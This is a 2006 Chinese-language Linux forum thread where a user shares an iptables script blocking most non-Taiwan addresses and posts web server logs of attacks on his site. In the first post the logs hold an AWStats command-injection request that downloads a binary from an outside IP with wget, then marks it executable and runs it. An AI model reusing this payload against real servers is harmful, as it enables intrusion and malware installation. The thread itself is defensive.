分享自己目前使用的 iptables table 內容

linux相關問題與技術

分享自己目前使用的 iptables table 內容

文章黑牌種子教師 » 週三 1月 11, 2006 11:00 am

http://www.clwu.idv.tw/~clwu/iptables.tar.gz

主治功能: 拒絕大部份非台灣的 ip 來訪. 可以讓 log 檔看起來舒服很多,對以下[白爛]特別有效!

195.61.130.94 - - [11/Jan/2006:10:20:34 +0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:35 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:37 +0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:38 +0800] "POST /xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:39 +0800] "POST /blog/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:41 +0800] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:42 +0800] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:44 +0800] "POST /drupal/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:45 +0800] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:47 +0800] "POST /wordpress/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:48 +0800] "POST /xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:50 +0800] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
195.61.130.94 - - [11/Jan/2006:10:20:52 +0800] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 302 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

注意事項: 請加減增加符合你的須要條件,或者刪除前三行內容存檔,

iptables -F
iptables -X
iptables -Z

以 cat set_iptables >> 你的 iptables 設定檔案, 或加到 /etc/rc.local 建意在 rc.local 加上 set_iptables 的存放路徑.
黑牌種子教師
 

Re: 分享自己目前使用的 iptables table 內容

文章黑牌種子教師 » 週二 1月 17, 2006 12:19 pm

203.66.245.201 - - [17/Jan/2006:12:02:20 +0800] "OPTIONS / HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:20 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:21 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:21 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:22 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:22 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:22 +0800] "OPTIONS /%7Eclwu/depth.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:23 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:23 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:24 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:24 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:24 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:25 +0800] "OPTIONS / HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:25 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:25 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:26 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:26 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:27 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:27 +0800] "OPTIONS /%7Eclwu/depth.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:28 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:28 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
203.66.245.201 - - [17/Jan/2006:12:02:28 +0800] "OPTIONS /work.html HTTP/1.1" 302 334 "-" "Microsoft Data Access Internet Publishing Provider

哇! 真是稀客,這地方來的可能功夫比較好,也許是那裏的[工友]來訪罷? 不然好像也不怎麼樣!

http://www.tsmc.com/chinese/default.htm 還是我弄錯了,非來自.....
黑牌種子教師
 

Re: 分享自己目前使用的 iptables table 內容

文章黑牌種子教師 » 週三 1月 18, 2006 8:25 am

再次更新 iptables.tar.gz 內容,約新增 60 個以上 iptables 條件.
黑牌種子教師
 

Re: 分享自己目前使用的 iptables table 內容

文章黑牌種子教師 » 週五 1月 20, 2006 11:55 pm

從 log 檔中,得知還有網友下載 iptables.tar.gz, 在這裏請這些網友注意以下事項:

你的 ntpd server 為何, ip 為何?
你的 update 是指向那個地方? ip 為何?
你有裝些須要外部主機支援的程式或服務嗎? ip 為何?

請將以上 ip 記錄,然後打開下載的 iptables 裏找找看,內容是否有不當設定,如果以上服務的來源 ip 被設定了,將會影響到主機上的功能. 尤其是國外的服務須特別注意.

感謝!
黑牌種子教師
 

Re: 分享自己目前使用的 iptables table 內容

文章黑牌種子教師 » 週六 1月 21, 2006 2:04 pm

已取消下載.
黑牌種子教師
 


回到 linux技術討論

誰在線上

正在瀏覽這個版面的使用者:沒有註冊會員 和 0 位訪客

cron